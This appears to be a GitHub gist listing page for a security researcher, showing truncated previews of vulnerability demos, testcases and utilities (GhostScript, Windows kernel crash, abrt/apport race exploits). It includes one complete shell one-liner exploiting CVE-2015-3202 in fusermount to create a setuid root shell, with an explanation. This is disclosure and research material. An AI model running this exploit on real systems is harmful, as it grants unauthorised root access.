Skip to content

Instantly share code, notes, and snippets.

Tavis Ormandy taviso

Block or report user

Report or block taviso

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@taviso
taviso / fbmon.c
Last active Jul 22, 2019
fbmon bug
View fbmon.c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
/*
$ gcc fbmon.c
$ ./a.out
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
@taviso
taviso / msdn.sh
Created Jul 12, 2019
Read MSDN pages in a terminal.
View msdn.sh
# man equivalent for msdn pages so I can look them up in the console.
function msdn()
{
local lucky="https://www.google.com/search?btnI"
local query="q=site:docs.microsoft.com+inurl:/en-us/windows/desktop/"
local title="Microsoft Developer Network"
local cache="${HOME}/.msdn/"
if ! type lynx > /dev/null; then
echo "error: lynx is not installed, please install it." 1>&2
@taviso
taviso / testcase.ps
Last active Aug 30, 2018
GhostScript Testcase
View testcase.ps
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)
% ImageMagick define setpagedevice, just remove their definition. This doesn't
% do anything if not using ImageMagick.
userdict /setpagedevice undef
% function to check if we're on Linux or Windows
/iswindows {
% Just checking if paths contain drive
@taviso
taviso / DefText.c
Created Nov 8, 2017
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
View DefText.c
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
typedef struct _LARGE_STRING {
ULONG Length;
ULONG MaximumLength:31;
@taviso
taviso / delete-twitter-dm.js
Created Nov 3, 2017
Automate deleting twitter direct messages.
View delete-twitter-dm.js
// Open direct messages window, paste this into console.
function deleteNextConversation()
{
if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
clearInterval(tmr)
return;
}
dm.firstChild.click();
setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);
@taviso
taviso / CVE-2015-3202
Created May 21, 2015
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
View CVE-2015-3202
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;
# $b is used twice, first to build the contents of shellscript $a, and then as
@taviso
taviso / raceabrt.c
Created Apr 14, 2015
Race condition exploit for CVE-2015-1862
View raceabrt.c
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdio.h>
#include <signal.h>
#include <err.h>
#include <string.h>
#include <alloca.h>
#include <limits.h>
#include <sys/inotify.h>
@taviso
taviso / newpid.c
Created Apr 14, 2015
Apport/Abrt Vulnerability Demo Exploit.
View newpid.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
View Inject.c
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#include <winnt.h>
View SetPalette.c
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include <windows.h>
#include <assert.h>
#include <stdio.h>
#include <winerror.h>
#include <winternl.h>
#include <stddef.h>
#include <winnt.h>
You can’t perform that action at this time.